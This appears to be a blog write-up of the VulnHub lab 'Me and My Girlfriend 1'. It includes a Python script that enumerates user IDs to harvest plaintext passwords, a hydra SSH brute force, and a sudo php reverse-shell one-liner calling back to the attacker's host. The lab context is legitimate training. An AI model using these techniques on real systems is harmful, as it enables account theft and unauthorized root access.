Vulnhub之Me and My Girlfriend1

vulnhub

字数统计: 781阅读时长: 3 min

 2019/02/10   Share

Abstract

靶机地址：传送门

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

描述说这是一个菜鸟级难度的靶机，存在两个Flag文件

环境搭建

下载VMware-ovf-tool然后安装在VMware的目录下，就能通过VMware添加虚拟机的方式导入ova文件，然后扫描存活机器拿到ip

靶机：192.168.134.131
Kali：192.168.134.128
win10：192.168.134.1

Play

信息收集

➜  vulnhub nmap -p- -T4 -sV 192.168.134.131 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 15:28 CST
Nmap scan report for localhost (192.168.134.131)
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:1D:F7:15 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds

只是开放了80和22端口。一般套路就是通过80口收集到一些账号密码，然后去爆破ssh服务getshell

直接打开web服务提示需要xff头部指定ip地址，这个简单，直接祭出modheader插件设置然后访问

注册了一个账号yoga，然后登录上去。每个地方都点了点，找到一个修改密码的功能

随手测试了下，这里只用了user_id来判断用户

漏洞利用

借助py遍历id拿到全部的账号密码

import requests
from bs4 import BeautifulSoup

if __name__ == "__main__":
    for id in range(1,12):
        url = "http://192.168.134.131/index.php?page=profile&user_id=" + str(id)
        headers = {
            "Cookie":"PHPSESSID=4jbr8i0af7o0o4sk4he61919i6",
            "x-forwarded-for":"127.0.0.1",
            "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
            "Connection":"close"
        }
        resp = requests.get(url=url,headers=headers)
        if resp.status_code is not 200:
            continue
        html = BeautifulSoup(resp.content.decode('UTF-8'))

        username = html.find('input', id='username')['value']
        passwd = html.find('input',id='password')['value']
        if username:
            #hydra爆破的账号密码格式
            print(username+":"+passwd)

运行拿到结果

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
yoga:yoga

保存为txt，然后借助hydra进行爆破

拿到alice账号密码，直接ssh登录

在当前用户下的隐藏文件夹.my_secret找到flag1

Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

提示我们需要提权至root拿到第二个flag

提权

查看该用户能sudo的命令

alice@gfriEND:~/.my_secret$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php

结案了，直接可以通过php获取root权限

1	sudo php -r '$sock=fsockopen("192.168.134.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

顺手转为tty式交互shell，进入root目录拿到flag2!!!!

Next Post

Vunlhub之freshly
Previous Post

浅谈Redis未授权攻击方式

CATALOG

1. Abstract
2. 环境搭建
3. Play

